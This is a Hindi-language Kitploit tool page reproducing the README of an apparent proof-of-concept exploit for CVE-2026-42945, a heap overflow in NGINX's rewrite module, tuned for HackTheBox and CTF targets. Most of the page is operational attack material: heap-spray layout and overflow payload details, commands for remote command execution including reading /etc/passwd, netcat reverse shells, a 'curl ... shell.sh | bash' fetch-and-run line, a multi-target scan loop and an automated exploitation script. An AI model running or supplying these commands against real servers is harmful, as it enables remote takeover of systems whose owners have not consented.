Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-42945-POC — CVE-2026-42945 के लिए शोषण | Kitploit
उपकरण/GitHubGitHub/cipherspy/cve-2026-42945-poc
टोहीपेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षाबाइनरी शोषण
GitHubcipherspy/cve-2026-42945-poc

CVE-2026-42945-POC

541373 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-42945 के लिए शोषण

रिपॉजिटरी देखें

CVE-2026-42945 (NGINX Rift) - HTB-तैयार एक्सप्लॉइट

NGINX हीप बफर ओवरफ्लो कमजोरी के लिए स्वतंत्र एक्सप्लॉइट जो 2024 में खोजा गया था। यह संस्करण HackTheBox और CTF वातावरणों के लिए अनुकूलित है जहां आप Docker कंटेनर सेट नहीं कर सकते।

भेद्यता विवरण

CVE-2026-42945 एक गंभीर हीप बफर ओवरफ्लो है, जो NGINX के ngx_http_rewrite_module में है और 2008 (संस्करण 0.6.27) से मौजूद है। यह बग निम्नलिखित स्थितियों में होता है:

  1. एक rewrite निर्देश में प्रतिस्थापन में ? होता है (is_args = 1 सेट होता है)
  2. एक set निर्देश URI के भाग को कैप्चर करता है
  3. लंबाई की गणना शून्य किए गए उप-इंजन पर होती है (is_args = 0 देखता है)
  4. कॉपी चरण मुख्य इंजन पर चलता है (is_args = 1 देखता है)
  5. URI एस्केपिंग वर्णों को 3 गुना बढ़ा देता है, जिससे छोटे बफर में ओवरफ्लो होता है

प्रभावित संस्करण

  • NGINX ओपन सोर्स: 0.6.27 - 1.30.0
  • NGINX प्लस: R32 - R36

सुधारित संस्करण

  • NGINX ओपन सोर्स: 1.31.0, 1.30.1
  • NGINX प्लस: R36 P4, R35 P2, R32 P6

शामिल फाइलें

  1. nginx_rift_htb.py - मुख्य एक्सप्लॉइट स्क्रिप्ट
  2. nginx_rift_helper.py - टोही और जानकारी लीक सहायक
  3. README.md - यह फ़ाइल

आवश्यकताएँ

root@kitploit:~
# Python 3.6+
sudo apt update
sudo apt install python3 netcat-openbsd

# No additional Python packages needed - uses only stdlib!

त्वरित आरंभ

1. जांचें कि लक्ष्य असुरक्षित है या नहीं

root@kitploit:~
python3 nginx_rift_htb.py --target 10.10.11.x --check-only

यह करेगा:

  • पता करेगा कि NGINX चल रहा है या नहीं
  • संस्करण की पहचान करने का प्रयास करेगा
  • /api/ एंडपॉइंट की जाँच करेगा
  • रिपोर्ट करेगा कि लक्ष्य असुरक्षित दिखता है या नहीं

2. टोही (अनुशंसित)

root@kitploit:~
python3 nginx_rift_helper.py --target 10.10.11.x --all

यह करता है:

  • NGINX फिंगरप्रिंटिंग
  • संस्करण पहचान
  • एंडपॉइंट खोज
  • जानकारी लीक का पता
  • व्यवहार विश्लेषण

3. एक्सप्लॉइट चलाएँ

एक कमांड निष्पादित करें:

root@kitploit:~
python3 nginx_rift_htb.py --target 10.10.11.x --port 80 --cmd "id"

रिवर्स शेल प्राप्त करें:

root@kitploit:~
# Start listener first (in another terminal)
nc -lvnp 4444

# Run exploit
python3 nginx_rift_htb.py --target 10.10.11.x --shell --lhost 10.10.14.5 --lport 4444

उपयोग उदाहरण

बुनियादी कमांड निष्पादन

root@kitploit:~
# Execute 'id' command
python3 nginx_rift_htb.py --target 10.10.11.23 --cmd "id"

# Execute 'whoami'
python3 nginx_rift_htb.py --target 10.10.11.23 --cmd "whoami"

# Read /etc/passwd
python3 nginx_rift_htb.py --target 10.10.11.23 --cmd "cat /etc/passwd"

रिवर्स शेल

root@kitploit:~
# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Run exploit
python3 nginx_rift_htb.py \
    --target 10.10.11.23 \
    --shell \
    --lhost 10.10.14.5 \
    --lport 4444 \
    --verbose

कस्टम पते (यदि ASLR अक्षम है या आपके पास लीक हैं)

root@kitploit:~
python3 nginx_rift_htb.py \
    --target 10.10.11.23 \
    --cmd "id" \
    --heap-base 0x555555659000 \
    --libc-base 0x7ffff77ba000

उन्नत विकल्प

root@kitploit:~
python3 nginx_rift_htb.py \
    --target 10.10.11.23 \
    --port 8080 \
    --cmd "curl http://10.10.14.5/shell.sh | bash" \
    --tries 20 \
    --verbose

एक्सप्लॉइट को समझना

यह कैसे काम करता है

  1. हीप स्प्रे: एक्सप्लॉइट कई POST अनुरोध भेजता है जिनमें नकली ngx_pool_cleanup_s संरचना वाले निर्मित बॉडी होते हैं
  2. ओवरफ्लो ट्रिगर: /api/ पर एक GET अनुरोध भेजता है जिसमें विशेष रूप से निर्मित URI होता है जो एस्केप होने पर ओवरफ्लो करेगा
  3. क्लीनअप हुक: ओवरफ्लो एक आसन्न पूल के क्लीनअप पॉइंटर को दूषित करता है ताकि वह हमारी नकली संरचना की ओर इंगित करे
  4. कोड निष्पादन: जब पूल नष्ट होता है, तो यह हमारे कमांड के साथ system() को कॉल करता है

मुख्य पैरामीटर

  • लक्ष्य बाइट्स: 6-बाइट पते जिनमें केवल URL-सुरक्षित वर्ण होने चाहिए
  • स्प्रे बॉडी: 4000-बाइट POST बॉडी जिसमें नकली क्लीनअप संरचना होती है
  • ओवरफ्लो पेलोड: 349 'A' + 969 '+' वर्ण जो एस्केप के दौरान 3 गुना विस्तारित होते हैं

ASLR विचार

एक्सप्लॉइट मानता है कि ASLR अक्षम है या आप पते जानते हैं। HTB पर:

  • कुछ बॉक्स आसान शोषण के लिए ASLR अक्षम करते हैं
  • अन्य को जानकारी लीक खोजने की आवश्यकता होती है
  • सहायक स्क्रिप्ट टोही में सहायता कर सकती है

यदि ASLR सक्षम है, तो आपको आवश्यकता हो सकती है:

  1. एप्लिकेशन में जानकारी लीक खोजें
  2. ब्रूट फोर्स (कई प्रयासों की आवश्यकता)
  3. आंशिक ओवरराइट का उपयोग करें (उन्नत)

समस्या निवारण

"लक्ष्य NGINX चला रहा प्रतीत नहीं होता"

  • सत्यापित करें कि लक्ष्य वास्तव में NGINX चला रहा है
  • जांचें कि पोर्ट सही है या नहीं
  • WAF/प्रॉक्सी के पीछे हो सकता है

"/api/ एंडपॉइंट की पुष्टि नहीं हो सकी"

असुरक्षित कॉन्फ़िगरेशन आवश्यक है:

root@kitploit:~
location ~ ^/api/(.*)$ {
    rewrite ^/api/(.*)$ /internal?migrated=true;
    set $original_endpoint $1;
}
  • यदि rewrite+set कहीं और मौजूद है तो एक्सप्लॉइट अभी भी काम कर सकता है
  • अलग-अलग सामान्य पथ आज़माएँ: /api/, /admin/, /internal/

"सभी शोषण प्रयास विफल रहे"

संभावित कारण:

  1. ASLR सक्षम है - पते यादृच्छिक हैं
    • समाधान: जानकारी लीक खोजें या ब्रूट फोर्स करें
  2. अलग libc संस्करण - system() अलग ऑफ़सेट पर
    • समाधान: --verbose के साथ सभी ऑफ़सेट आज़माएँ
  3. संस्करण असुरक्षित नहीं है - सुधारित संस्करण या अलग कॉन्फ़िगरेशन
    • समाधान: सहायक स्क्रिप्ट से संस्करण सत्यापित करें
  4. WAF/IDS अवरुद्ध - सुरक्षा नियंत्रण मौजूद हैं
    • समाधान: चोरी की तकनीकों की आवश्यकता हो सकती है
  5. गलत एंडपॉइंट - rewrite+set कॉम्बो का उपयोग नहीं
    • समाधान: वास्तविक असुरक्षित एंडपॉइंट खोजें

वर्बोज़ मोड

डिबगिंग के लिए हमेशा --verbose का उपयोग करें:

root@kitploit:~
python3 nginx_rift_htb.py --target 10.10.11.23 --cmd "id" --verbose

यह दिखाता है:

  • प्रत्येक स्प्रे अनुरोध की स्थिति
  • कनेक्शन प्रयास
  • ओवरफ्लो ट्रिगर समय
  • क्रैश डिटेक्शन लॉजिक

HTB-विशिष्ट सुझाव

अपना VPN IP ढूँढना

root@kitploit:~
# Find your tun0 IP
ip addr show tun0 | grep inet

# Use this IP for --lhost
python3 nginx_rift_htb.py --target TARGET --shell --lhost YOUR_TUN0_IP --lport 4444

शेल को स्थिर करना

एक बार प्रारंभिक पहुँच मिलने पर:

root@kitploit:~
# Upgrade to TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Background and set terminal
Ctrl+Z
stty raw -echo; fg
export TERM=xterm

शेल के बाद सामान्य HTB गणना

root@kitploit:~
# Check current user
id
whoami

# Check for flags
find / -name "user.txt" 2>/dev/null
find / -name "root.txt" 2>/dev/null

# Check sudo permissions
sudo -l

# Check SUID binaries
find / -perm -4000 2>/dev/null

उन्नत उपयोग

कस्टम पेलोड जनरेशन

यदि आपको पेलोड को अनुकूलित करने की आवश्यकता है:

root@kitploit:~
# Edit the make_body() function in nginx_rift_htb.py
# Adjust BODY_LEN for different configurations
# Modify the overflow string (349 'A' + 969 '+')

एकाधिक लक्ष्य

root@kitploit:~
# Create a target list
cat targets.txt
10.10.11.23
10.10.11.24
10.10.11.25

# Test each one
while read target; do
    echo "Testing $target"
    python3 nginx_rift_htb.py --target $target --check-only
done < targets.txt

स्वचालित शोषण

root@kitploit:~
#!/bin/bash
TARGET=$1
LHOST=$2

echo "[*] Starting listener..."
nc -lvnp 4444 &
LISTENER_PID=$!

sleep 2

echo "[*] Running exploit..."
python3 nginx_rift_htb.py \
    --target $TARGET \
    --shell \
    --lhost $LHOST \
    --lport 4444 \
    --verbose

wait $LISTENER_PID

तकनीकी विवरण

असुरक्षित कोड पैटर्न

root@kitploit:~
location ~ ^/api/(.*)$ {
    rewrite ^/api/(.*)$ /internal?migrated=true;  # Sets is_args=1
    set $original_endpoint $1;                     # Allocates based on is_args=0
}

शोषण प्रवाह

root@kitploit:~
1. Spray POST → Fill heap with fake cleanup structures
2. GET /api/AAAA...++++...X → Trigger overflow
3. Overflow corrupts adjacent pool cleanup pointer
4. Pool destroyed → Calls system(cmd)

मेमोरी लेआउट

root@kitploit:~
[Heap Spray Body - 4000 bytes]
+0:  system_addr (8 bytes)
+8:  data_addr (8 bytes) 
+16: next (8 bytes, NULL)
+24: command_string (variable)
+remaining: padding 'A'

संदर्भ

  • मूल POC: https://github.com/p3Nt3st3r-sTAr/CVE-2026-42945-POC
  • तकनीकी लेख: https://depthfirst.com/research/nginx-rift
  • NGINX सलाह: https://my.f5.com/manage/s/article/K000160932
  • CVE विवरण: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42945

अस्वीकरण

यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। इसका उपयोग उन सिस्टमों के विरुद्ध करना जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध है। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता।

क्रेडिट

  • मूल भेद्यता depthfirst द्वारा खोजी गई
  • मूल POC: p3Nt3st3r-sTAr
  • HTB अनुकूलन: स्वतंत्र उपयोग के लिए संशोधित

लाइसेंस

केवल शैक्षिक/अनुसंधान उद्देश्य। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें